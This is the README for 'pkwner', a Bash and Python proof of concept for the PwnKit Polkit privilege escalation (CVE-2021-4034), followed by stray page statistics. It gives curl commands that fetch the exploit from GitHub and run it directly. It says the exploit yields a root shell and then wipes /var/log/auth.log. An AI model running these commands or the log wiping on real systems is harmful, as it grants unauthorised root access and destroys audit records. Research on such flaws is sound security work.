██████╗ ██╗ ██╗██╗ ██╗███╗ ██╗███████╗██████╗
██╔══██╗██║ ██╔╝██║ ██║████╗ ██║██╔════╝██╔══██╗
██████╔╝█████╔╝ ██║ █╗ ██║██╔██╗ ██║█████╗ ██████╔╝
██╔═══╝ ██╔═██╗ ██║███╗██║██║╚██╗██║██╔══╝ ██╔══██╗
██║ ██║ ██╗╚███╔███╔╝██║ ╚████║███████╗██║ ██║
╚═╝ ╚═╝ ╚═╝ ╚══╝╚══╝ ╚═╝ ╚═══╝╚══════╝╚═╝ ╚═╝
A Python3 and a BASH PoC for CVE-2021-4034 by Kim Schulz
Intro
This is a simple PoC for the newly found Polkit error names PwnKit.
I made it both as bash and python3 script - just for the fun of it.
The issue is very simple to abuse but has huge consequences as it will easily give root access on most Linux machines where the attacker has local user access.
How to run
This scripts are a one shot execution so simply do
python3 pkwner.py
or
bash pkwner.sh
You can also run it directly from a webserver (e.g. this github repo) via:
python3 <(curl https://raw.githubusercontent.com/kimusan/pkwner/main/pkwner.py)
or
source <(curl -s https://raw.githubusercontent.com/kimusan/pkwner/main/pkwner.sh))
In both cases it should look something like this: 
and 
The script will create some files and folders but will cleanup after itself when the root shell is popped - it will even clean up the /var/log/auth.log (because why not).
Credits
- Qualys for finding the issue and making the info public
- Andris Raugulis for making one of the first PoCs to get inspired from
- MiscGang because misgang@Kalmarunionen are baddass
171 Dec 25, 2022
3 Feb 10, 2022
1.3k Dec 31, 2022
2 Mar 15, 2022
6 Aug 07, 2021
3 Dec 13, 2021
3 Jan 23, 2022
112 Dec 01, 2022
3 Mar 24, 2022
10 Nov 23, 2022
4 Jan 10, 2022
3 Jan 26, 2022
144 Nov 19, 2022
129 Dec 30, 2022
16 Dec 18, 2022
1.2k Dec 25, 2022
5 Oct 09, 2022
1 Feb 20, 2022
36 Dec 20, 2022
18 Sep 03, 2022